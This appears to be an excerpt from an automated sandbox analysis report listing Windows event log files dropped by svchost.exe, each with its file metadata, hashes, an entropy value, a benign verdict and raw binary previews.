                                                                              Preview:ElfChnk.........L...............L....................:.N....................................................................j...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=....................................................................`..........**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.1559400308203562
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zZ:Bmw9g3Lf
                                                                              MD5:64B9990B5E7F3874310C63A28FF2269B
                                                                              SHA1:B1A4325EECAFB72D9AFF23F1759F866757699E9E
                                                                              SHA-256:3C9770DF816491A1C40167F1C53A46FB17122962B646A72F604ED3044A981DCC
                                                                              SHA-512:BC184A0543AC3022AC17527A5569CA2105E1A9B779B829A7B1FB3A72BD2B429797E1E09A229880E5803F38809A17D2FE019374D87EBC6658AB55DB837DF5C6A3
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........6...............6...........(o...p...].O....................................................................|.3.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#....................................................................X..........**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.887574143139413
                                                                              Encrypted:false
                                                                              SSDEEP:384:BhoIRbiY8sITkAI6RdkbI4IfIixIWMIPIxIJI7IyIUIgIoqIuILI:BOnDB
                                                                              MD5:59A9F7EF42800364F6BF938C549BBD94
                                                                              SHA1:43FAC818EB3960E73963CFD78F1AE4DE6A3799D6
                                                                              SHA-256:E2BD020B97A6FB59EF57126B4DC72C56E7F457A06C7F911243C77BC0C1ACC206
                                                                              SHA-512:2A62CCA656E0761FF2C1F585207C03B19E9E827C80293C9A402C01A353D47774BC97A7A48CD136862131F18434DD29245D3A1E20E88A72AF45824ECAB6B26153
                                                                              Malicious:false
                                                                              Preview:ElfChnk.K.......L.......K.......L...........x...86.....&......................................................................e.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..x...K.....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
                                                                              Category:dropped
                                                                              Size (bytes):69080
                                                                              Entropy (8bit):4.509980090125105
                                                                              Encrypted:false
                                                                              SSDEEP:768:liaBJiaBCPIEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWD4gmd:rp1
                                                                              MD5:4B9585E14B400BA518CC335B3465E183
                                                                              SHA1:A6D863D32FFC91A6B026E1BF20E5493509CE4EE0
                                                                              SHA-256:6535D132FBEA1AAE14E3E8FC858CFA365EE06F0409EC89E6E316CF5E54CE7A93
                                                                              SHA-512:D1B5D3A3278A7B18C5EC75C8E9460D0FF293C2810643ED2AD2F6D946D1E374CF9854A28714BCBAAEEB004AC1F70CF09A7182893DF0E1432ABC4985CAECADEC01
                                                                              Malicious:false
                                                                              Preview:ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X.............................................................................au................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..p...~........qV..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.9969363418868648
                                                                              Encrypted:false
                                                                              SSDEEP:384:Oh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMGmMqb+MvhMIp:OeJWU
                                                                              MD5:F3F76FCFEA8151604EA805CB80B1FF45
                                                                              SHA1:53062346A40583E0ED706493B387818CF85A608A
                                                                              SHA-256:46BE32A18F777427FCB76E515EDD8612F22823F8D5F9C75FAF64DFBC9D810BC0
                                                                              SHA-512:DF7829C3655FC7F7AF8C6F82DF8F48C3842AB6AC99B32705AC232DDD1D7398A93B3C03BA8217D055702FB8881AC8FC5DECCEAB8E2ED23F8B73C7B2737DFD00C2
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................+..0-...i........................................................................z4........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&............................................................................................................%..........**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.231994720329579
                                                                              Encrypted:false
                                                                              SSDEEP:384:ehk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS16:eBjdjP0csCk+
                                                                              MD5:2418B580C396BF3D2B2E78EF78F65991
                                                                              SHA1:5AA4D8E6E8EC06232294A57762DCF70B6A4AEC46
                                                                              SHA-256:4FA9363ED99CF66AA2B887DB72C99F7E21B364AAFE0C169B5CEACEF72E971557
                                                                              SHA-512:650C05CE840801E047324A41E74F07718BC4503AD16860C4161B31027B2D480F0DD72B1EB936F08C3985DDAE151D7340D1C7DD09C61F957694A3A800F7923F4C
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................p...$.._......................................................................5.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):77968
                                                                              Entropy (8bit):3.346591659832869
                                                                              Encrypted:false
                                                                              SSDEEP:384:MxlIj3SIWILIlIRIYzIvI3IoXIYD4IKIIQIq9IWIYIFI7IkIzIMMIPIj/hDIEQAP:MG//ZxGuTcr8
                                                                              MD5:1E6E6D812DDBFE6554EE7D09E2613C23
                                                                              SHA1:339E1F75DC13CA9562037AFC19C265BD70110181
                                                                              SHA-256:D30D8665BC1F8918203F0B273C8277D9DF22684A3B67954B994EC5A6A9DACBC3
                                                                              SHA-512:C39903D12DC293DF21DB256BC8B4B99B63C2044B9B3C3C710460CE68518F43E1C7E4A19E70BBDC4BD2D7CA36AC38C9F0E9B8A6DC2B4AF59B129C8F20D6A3C293
                                                                              Malicious:false
                                                                              Preview:ElfChnk.T...............T...................x...h...U.].....................................................................:o.w........................................>...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................1........................................<...............(..........**......x.......bw..^........F...(..............................................................,.......D.....!........... ....@bw..^.....................P...x....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l...........&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8010759015442367
                                                                              Encrypted:false
                                                                              SSDEEP:384:Zmh6iIvcImIvITIQIoIoI3IEIMIoIBIjIIQIYIRIEMIO4I:ZmoxDJ
                                                                              MD5:697F5D7E812BBBA5F48BAEEE79161558
                                                                              SHA1:2BB9620AEAFE781DAD1250C78AE760F530C04FEF
                                                                              SHA-256:1F9630EFD18553522D80986F123499E9172D5D8949BD43F82D0964ED671CE516
                                                                              SHA-512:166A91F00C96D4B5DB8C75B843FCD2ED191CAF2D82CEB41138FD22663D481CB50BF38D5C522524C94033EE7CD3C303AFA60261F95900299C73E2E0277834C598
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................X"...#..!.._.....................................................................8.Y............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................^...........**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.9976457275581723
                                                                              Encrypted:false
                                                                              SSDEEP:768:j4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13N:p
                                                                              MD5:8B81799FB23EDB0DFBBE63CB0A6D0091
                                                                              SHA1:08F10769E5AC65A808F3229113875C18E68F02A2
                                                                              SHA-256:199F3107FA0F478BECC0D255CA70F74B63F048F6B43015C4BCEFC7DB07358609
                                                                              SHA-512:098626BC09ECABD19653ADFE82C5CC8A73C4CD1537C28E781484F6B676E837896C892B3E0691E5D469C1972A76B646456E14907280D1040181C1F973B9302E61
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):69752
                                                                              Entropy (8bit):3.87989584428036
                                                                              Encrypted:false
                                                                              SSDEEP:768:+fdutDMjV8k+u7eUtHpoVWk6HrWbGyYKQc90XU07SZRcZv76NcRUjGHzLKvc90X:8utDMjV8k+u7PtHpoVW
                                                                              MD5:1F58EC628BA97CF1A7EF30ED1B5D1C77
                                                                              SHA1:3D55DF2B14BE2A77AE8B71EE1154228A615ECACC
                                                                              SHA-256:8C12F1B929E28A65D2249E1EA94C17C74273817543516E8E893B337BCD7ADFFD
                                                                              SHA-512:5512B0E5F09252874AF662BB94FBBFFB0476CD9967CAE525E2B54937C92FE40A0F17CFDC45FF844E2E0946ECC43F6BCB13B68EBDAB0CBD3514B5336A1863A890
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.446389340861676
                                                                              Encrypted:false
                                                                              SSDEEP:768:Z73QQ6FAR3Jmuh9MmjoEawi5kzp7kaEDC1Nol7iL:x30AR9Mm+wim74JiL
                                                                              MD5:987FCEB3FED984E85C924A55CBE7901D
                                                                              SHA1:E7D302E40C5681D0E8B5CE38D1D58610570B66F9
                                                                              SHA-256:BF86420CFB4BE176EE74D4EE925801EEFE1317330EF24F05C4069E4E19992E0A
                                                                              SHA-512:1A8AF2EB3FB7D7437350D1039591704BCE31F42D6ADE104E5AB72FC6C1F6C5E068410E05CB864EEF0DBB3D98FB8D4B3841F84DD6512A278065B53861B3BDACB3
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.7589270703948895
                                                                              Encrypted:false
                                                                              SSDEEP:384:fhP8o8Z85848V8M8g8D8R8E8y8eE8U8+8G8:fy
                                                                              MD5:DB0D7D192D45E88155DA386A4CFAA7BC
                                                                              SHA1:0CA51DB6F3145F47A7DEE55DD59804DDC20788FF
                                                                              SHA-256:4D675E0BB5F2F8FB820C9A7E60290AA18EB63DB48D85C343D67B7D1036CAF535
                                                                              SHA-512:77BF88FE30C9A2E76B610094998F26BB168BAC41DA2A70C4BCB9C7A7A67B2821C6E7F2D57535CBB47EBC07A89F69BA997028F30ED43D507CB0E9C268BDC74789
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.7681443373841628
                                                                              Encrypted:false
                                                                              SSDEEP:1536:2XhZUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:2XLnS
                                                                              MD5:ECD50547DA19F16A51FDA8A61B13972B
                                                                              SHA1:D13DE19172977CE5D0200DA8D97CF9EA228E4551
                                                                              SHA-256:CB25E241C8446B843D41F381632449B09EA92699F04E3900A8DE21BB8D745F29
                                                                              SHA-512:7307453F82D151781DC95CAB8631A215F4921EA68983AD07D7A82BD6D85F19226964C5686816D9B39926BFE5899BED2CB764FED200A9117273C9A4006EC64AB3
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.3821645601708283
                                                                              Encrypted:false
                                                                              SSDEEP:768:U0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O4aui1J6eJOQJMBJX:4cE
                                                                              MD5:CBF5E5B9F2994F33BE03BF0A826A629E
                                                                              SHA1:BFF85BF98CE5D092C06B3A7D366A077B5736E934
                                                                              SHA-256:B6B321D43FBF2CEE1D19A0EB4E3AA5134660D844E2DED9871E98A58DE11461E3
                                                                              SHA-512:7FFD68E0DE84CFD8CF091526E624209FF41644A2EBBEF4BED8584F11F4EC333BC5BA880257417930C6DAB318094D59479BB160949CAAC0FC985A3EE946071D73
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2680
                                                                              Entropy (8bit):3.83226399830889
                                                                              Encrypted:false
                                                                              SSDEEP:48:McWtzCKOrCK3QuB69DifSrCKOrCK3QQkcqr8l+bCKOrCK3QQkcqr9:izCKOrCKgO69DCeCKOrCKgQkcG8GCKO+
                                                                              MD5:09ED2C1A198E4CA0195DE75D9326609D
                                                                              SHA1:FEEF26549A43B0004492890E9BDA463813F87A5C
                                                                              SHA-256:E033955F842AE6027C500E4EB9EBE7EAF12950B0E5A97FAE1CDBB94180BBEA44
                                                                              SHA-512:4A2A6A8FCD24F3C32BA61F65D25E729986CC7CF70CB65D9A79BB0D112AC588110679E14F8E213A61AD92F6CD9EE2E930F4B98F28F67250FB442D936B9B3DFB66
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.315070457008112
                                                                              Encrypted:false
                                                                              SSDEEP:384:NYU/hDGCyCkCzCRCFCZC4MCyCcC7CgzCiCoCD24F2a2EO2M2w2s023C8CJCpCFIz:NYU/dEoNTC
                                                                              MD5:C7807651248E908ECCF27697EBB71AF0
                                                                              SHA1:4FE175151F778EF674F74D25145CCCF62C52F2C8
                                                                              SHA-256:A9D4FFC731E3D8287A25FFE350D5142FE1E9CD5D377F0BD7D29BB827C2F12658
                                                                              SHA-512:5A8FA490F7BFC98FD39635AA30A0E92AA3C9FFC279424C7D23E9F2893CF7B0FC91BF1F3DAFD14CA006B437AB6E18FAA67FBF7AF96E5347FE27042B262235214D
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.482742417101403
                                                                              Encrypted:false
                                                                              SSDEEP:1536:bcPLvjwmE+ukWvw75NFyBo/QbG7YX1cchg52p5cfFSYl8ZAgRrfhXWmSY0NGQ6my:bcPLvjwmE+ukWvw75NFyBo/Qq7YX1cct
                                                                              MD5:B1F20410E64B0CD42CE4FCBF7AFC9018
                                                                              SHA1:4EE19EB81E1C99FDC1C7BA4E87F091AB124FE250
                                                                              SHA-256:7AE6BA887BEF8232508D1660717AA893FE68C75D3E4B2D48668AC1E4CD3C0461
                                                                              SHA-512:31EDD8B6257AE2C232572765C7ED08A4BA016499A3B0340D55AF1796AD633D17533C0288E07F9B5E74D19A5CF842A63468AE54F61A49F680722E95A48983DE01
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):70808
                                                                              Entropy (8bit):4.461826984214522
                                                                              Encrypted:false
                                                                              SSDEEP:1536:XZzSEmaSmDO+Xxp4HTQMhzEB1PBM+4MFGhLF/EBRyqXiUHeISNplZzSEmaSmDO+w:XZzSvaSmDO+Xxp4HTQMhzEB1PBM+4MFT
                                                                              MD5:0930F903A34CF17A3874B947CC9B4524
                                                                              SHA1:4F8EBF8CA5716E71F27F403E5D8173FACB60AC1F
                                                                              SHA-256:36142DD0D2291D977807E4CCC461FF0C7D4ABE97A7F5078DB3BDA6E914F5016D
                                                                              SHA-512:0F5940AB657B2E629AE882CF7962F632448781070787300FC6189B6409AA8A08102279EADBB1DA309619099EEA96252198A830F1C555A5016EFEB2B5FC17DA86
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.512081865341501
                                                                              Encrypted:false
                                                                              SSDEEP:384:Arhl787V7s7y7s7M787/7m7C7p74797kc7h7s7b7Y717c7v7b7v7vV7p73a7k7Z+:Ut/8Hh
                                                                              MD5:50465D28597F69AA4BA1836894D19750
                                                                              SHA1:CC55004E17EAAF1672D0BDAE3A746C40F6AF7593
                                                                              SHA-256:376CBE44BE97D96C93CAB0B83E5480DF2D3EA3CE0169E199BBAC9D7650F4AB93
                                                                              SHA-512:725A9F34A7A98390A365F75B2701E31331C2F3CDD1CF62BABB20C3F5655DC0798469B353E7839E8159DBBE733B58A76DA3ABDAC6E7EE4A4D672CB934AC296F49
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):2.2719028651564623
                                                                              Encrypted:false
                                                                              SSDEEP:384:/hc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauing:/6Ovc0S5UyEeDgLLyfrlB8Q54GJY
                                                                              MD5:104AF6C87B1FA1C965BB2D3CF70EDC8F
                                                                              SHA1:91B208CE7ACC6EDAD1ADC8C5ECBB90000E00CEA2
                                                                              SHA-256:6DB30804B563EE808F78EEC69D3A85FF7F3F0FE551306B5924530C2C0EC2738C
                                                                              SHA-512:90A83431708CD8FBDC9FAD6AF191EDF3E264D8DEB457ABBCCA8941E15DE0DD4E4C2FB2D89B281C2FA11CA5D627010C96EBE3C43B6338DCA27E7701A883F8C295
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8167930057519079
                                                                              Encrypted:false
                                                                              SSDEEP:384:bhGuZumutu4uEu5uOuDuyb2uPu1uyuKtuLujuVgqu:bb+
                                                                              MD5:EBB9255F7BBA5C52CE625D69FE52F60A
                                                                              SHA1:20F226B11EF3A69F56A13A5BF7530E199BFDE310
                                                                              SHA-256:5AB28568919B051FA95E534049B8BA9E606EEF6EAB53EB0ADB71545C0ED2A380
                                                                              SHA-512:D8788F58A8DE7C9BD6F7075DC65606508D14C8AD8AC75E8992174A4D35328E70635AEC36531DA5E81A8DABD931092576C60C5B831C73670D856A40BD2427CB8E
                                                                              Malicious:false
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.235001208884112
                                                                              Encrypted:false
                                                                              SSDEEP:384:iGhRAEA/sA/8A/gA/lA/KA/EA/DA/ZA/oA/nA//A/PAzyEAuA8AjCbALuAMAKAtZ:J0hVi+KLN61G
                                                                              MD5:50EF6DB57587CF27291B2DED1AD3C542
                                                                              SHA1:ECF5C56F998FCA95BE4BA119DC5E241C693DB891
                                                                              SHA-256:14AD1DF267604F097745CC1A5C2DC6EDFEABF7E89A69A194B5433363A847F530
                                                                              SHA-512:E774A896DA5119D270D59E02DF113CF3E2FC774A24A0A7BDDB39E5D5D614B1F905BAA81FF59790811CAF51B4B92854A06C042D869EA2C52AB19E955E9BB00E4F
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.1601920702980912
                                                                              Encrypted:false
                                                                              SSDEEP:384:NhwpsWp90Np9b5p9ihp95lp949p9/pp9Wpp9tlp98Jp9jdp9qBp9BJp9A1Z1p9nP:NRZfQI5
                                                                              MD5:1A84D5BFFC6A51A8E813CA9870D46851
                                                                              SHA1:62201D49F347A7BEEA7D58DCB45D173ADBD53887
                                                                              SHA-256:CBF067DCF2548398B87EB882B7A1F26EC7989DBB4D105C4495020D63E9B5E0D8
                                                                              SHA-512:8B3198C3534387FEF8B8120ED0111F6EA02BD21FC3E8C4E74C4936BE18581C80BEF58EB512E111FF0143361E488F1F7C7D3151664E0F4FD996169C894162B24C
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.0114620219781365
                                                                              Encrypted:false
                                                                              SSDEEP:384:jhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBo:jwDoh1VvpE0Y5RA8sQ
                                                                              MD5:70F943A767EE17A83B03D620404602D6
                                                                              SHA1:26A2A2C8690D3F47D6192DDC29079CA4DE7507A6
                                                                              SHA-256:AAE4D860D5B31157D69935C9A68A8958EF96D9EBB7AB346B8F750E7FD339FBE5
                                                                              SHA-512:88CAB5E94A82F49036C5DC4A3C3DE94BADB9A2244C4A32DAE6A23DFD751553B0FF9953C21B02CA0396D5DBF529C75B57D1A65D9EA86CE86D8D081E63E464D521
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.165801171629505
                                                                              Encrypted:false
                                                                              SSDEEP:384:thwCCRzCaCkClCzCYC/CyCVCGCMCvCtlCaf2Ca9CaECaAzCaFECa:tKFD
                                                                              MD5:9236B0363C2E488481D99C2A3B97F664
                                                                              SHA1:7DF4CAC91226C2E2E36DB78D931D4D8386177406
                                                                              SHA-256:968CA40848BDBDDB24126CF3BA1EFE51973835B62A841A13ABBC3F3F76E2AAEC
                                                                              SHA-512:7ADE9B5AE3499BB97FBBCAD1F38F530E9592F4CB4AC3472553A340E0D172704CDD3EA2DE39914F5A2ACB87934037EFDE369AF960256269AC221B5AD9724BE31C
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):88152
                                                                              Entropy (8bit):4.598310163790206
                                                                              Encrypted:false
                                                                              SSDEEP:384:jhyMQyMOIMtMNjhyMQyMOIMtMN6KRKkKGxKTKMKxK2KqMqYvMaDMzMBYxMBYYK1D:j6j6L1FGE53tc60G
                                                                              MD5:13729562AEBB7EAC37D8F6585CBD282E
                                                                              SHA1:65A9FDFBAE5B0494C2051D4CCEEFC56714F5E7DF
                                                                              SHA-256:DBB39377816700D7EC16F25CC60F987225881D555F191A96355DE73047ABA8C8
                                                                              SHA-512:2DEC60BA1E13C3BE4EEE99BDE9C0BC247E9B7C72DC2624190D32952934F1F995FCB6D1D590AE5291DD395C4424FFD5193C462A6B6AD58CB1A776109382445D27
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.1810965962810462
                                                                              Encrypted:false
                                                                              SSDEEP:384:vhL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUm7UmLcUmWUmnUm:vY7LU
                                                                              MD5:9D9C182984FF3C8DAFD9D7D27F9461F0
                                                                              SHA1:72E2D06B61F085737906AD835D09009CFD047203
                                                                              SHA-256:C3D5C4AD8C13B39C1EC967B6A9DFCA4ACC94E48C00D1BFAA3BCC5D7B6B134EC2
                                                                              SHA-512:2906BF522ABB70A1E2F3F3DE63C732CCAC103B7F8D54CECF22730ED08A64BA1F6243CBC95EE1F1568ED45B7E608B60303B31B7A67EFDF52778CD239FF41F58E9
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):67776
                                                                              Entropy (8bit):0.36718741310867753
                                                                              Encrypted:false
                                                                              SSDEEP:48:M5VWd8acrP+8QNRBEZWTENO4brBT3oWx/6yHVWd8acrP+8QNRBEZWTENO4brBT3j:M+NVaO8JoWx/6yN+NVaO8JoWx/6y
                                                                              MD5:E3B380688C25E192E9393FBFCF5C5A7D
                                                                              SHA1:75168BA35710E5E636ECF826696E0994E43B06FA
                                                                              SHA-256:BCF9CFB550A454F6D71C78A7730057CB1B77B1FC3AF5C4E15E722E405E0FCA85
                                                                              SHA-512:83C6CFC9C5AD2AFD8AC6D3DB57D9F0D51F1EC91F5CD43862CE92D81072A434E94405D5AB0471EC1DB912C5984907AEF12ED3875FB2225264B9F375E5A63AF704
                                                                              Malicious:false
